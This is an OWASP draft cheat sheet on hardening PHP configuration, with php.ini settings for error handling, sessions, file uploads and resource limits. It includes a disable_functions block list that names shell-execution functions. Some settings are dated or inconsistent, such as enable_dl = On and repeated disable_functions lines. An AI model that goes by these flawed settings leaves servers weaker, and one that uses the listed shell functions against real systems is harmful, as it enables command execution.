Introduction

This page is part of the PHP Security Cheat Sheet, for developers and administrators. It describes secure configuration of PHP and its platform.

..: Work in Progress :..

Web Server Configuration

Apache

suPHP

suPHP makes every php script run as its file owner. This way you are allowed to upload and modify files in your folders without needing to chmod 777 any folder, which is very bad security practice and will let to your files be compromised easily. Install and configure it on your web server.

PHP Configuration and Deployment

suhosin

Consider using Suhosin (Stefan Esser's [Hardened PHP patch]) if you want to patch many custom security flaws in various parts of PHP.

php.ini

Note that some of following settings need to be adapted to your system, in particular /path/ and /application/. Also read the PHP Manual according dependencies of some settings.

PHP error handlling

 expose_php              = Off
 error_reporting         = E_ALL
 display_errors          = Off
 display_startup_errors  = Off
 log_errors              = On
 error_log               = /valid_path/PHP-logs/php_error.log
 ignore_repeated_errors  = Off

Keep in mind that you need to have display_errors off on a production server and it's a good idea to frequently notice the logs.

PHP general settings

 doc_root                = /path/DocumentRoot/PHP-scripts/
 open_basedir            = /path/DocumentRoot/PHP-scripts/
 include_path            = /path/PHP-pear/
 extension_dir           = /path/PHP-extensions/
 mime_magic.magicfile 	  = /path/PHP-magic.mime
 allow_url_fopen         = Off
 allow_url_include       = Off
 variables_order         = "GPSE"
 allow_webdav_methods    = Off

Allow_url_* prevents LFIs to be easily escalated to RFIs.

PHP file upload handling

 file_uploads            = On
 upload_tmp_dir          = /path/PHP-uploads/
 max_file_uploads        = 2

It's a good idea to turn it off, if your application is not using file uploads.

PHP executable handling

 enable_dl               = On
 disable_functions       = system, exec, shell_exec, passthru, phpinfo, show_source, popen, proc_open
 disable_functions       = fopen_with_path, dbmopen, dbase_open, putenv, move_uploaded_file
 disable_functions       = chdir, mkdir, rmdir, chmod, rename
 disable_functions       = filepro, filepro_rowcount, filepro_retrieve, posix_mkfifo
   # see also: http://ir.php.net/features.safe-mode
 disable_classes         = 

These are dangerous PHP functions. You should disable all that you don't use.

PHP session handling

 session.auto_start      = Off
 session.save_path       = /path/PHP-session/
 session.name            = myPHPSESSID
 session.hash_function   = 1
 session.hash_bits_per_character = 6
 session.use_trans_sid   = 0
 session.cookie_domain   = full.qualified.domain.name
 #session.cookie_path     = /application/path/
 session.cookie_lifetime = 0
 session.cookie_secure   = On
 session.cookie_httponly = 1
 session.use_only_cookies= 1
 session.cache_expire    = 30
 default_socket_timeout  = 60

It is a good practice to change session.name to something new.

some more security paranoid checks

 session.referer_check   = /application/path
 memory_limit            = 32M
 post_max_size           = 32M
 max_execution_time       = 60
 report_memleaks         = On
 track_errors            = Off
 html_errors             = Off

PHP Database Settings

Template:TBD: database sesttings should be done in web server's configuration (i.e. httpd.conf)

PHP Database User

Template:TBD: explain pros&cons what to set in php.ini and/or httpd.conf and/or registry

PHP Windows specific Settings

Template:TBD:

PHP Extension

Template:TBD:

Related Cheat Sheets

PHP_Security_Cheat_Sheet

Authors and Primary Editors

Achim Hoffmann - Achim at owasp.org

--AbiusX email

--Achim, 30. November 2012

Other Cheatsheets

OWASP Cheat Sheets Project Homepage

• Cheat Sheets

Developer Cheat Sheets (Builder)

• Authentication Cheat Sheet
• Choosing and Using Security Questions Cheat Sheet
• Clickjacking Defense Cheat Sheet
• C-Based Toolchain Hardening Cheat Sheet
• Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
• Cryptographic Storage Cheat Sheet
• DOM based XSS Prevention Cheat Sheet
• Forgot Password Cheat Sheet
• HTML5 Security Cheat Sheet
• Input Validation Cheat Sheet
• JAAS Cheat Sheet
• Logging Cheat Sheet
• .NET Security Cheat Sheet
• OWASP Top Ten Cheat Sheet
• Password Storage Cheat Sheet
• Pinning Cheat Sheet
• Query Parameterization Cheat Sheet
• Ruby on Rails Cheatsheet
• REST Security Cheat Sheet
• Session Management Cheat Sheet
• SQL Injection Prevention Cheat Sheet
• Transport Layer Protection Cheat Sheet
• Unvalidated Redirects and Forwards Cheat Sheet
• User Privacy Protection Cheat Sheet
• Web Service Security Cheat Sheet
• XSS (Cross Site Scripting) Prevention Cheat Sheet

Assessment Cheat Sheets (Breaker)

• Attack Surface Analysis Cheat Sheet
• XSS Filter Evasion Cheat Sheet

Mobile Cheat Sheets

• IOS Developer Cheat Sheet
• Mobile Jailbreaking Cheat Sheet

OpSec Cheat Sheets (Defender)

• Virtual Patching Cheat Sheet

Draft Cheat Sheets

• Access Control Cheat Sheet
• Business Logic Security Cheat Sheet
• Application Security Architecture Cheat Sheet
• PHP Security Cheat Sheet
• Secure Coding Cheat Sheet
• Secure SDLC Cheat Sheet
• Threat Modeling Cheat Sheet
• Web Application Security Testing Cheat Sheet
• Grails Secure Code Review Cheat Sheet
• IOS Application Security Testing Cheat Sheet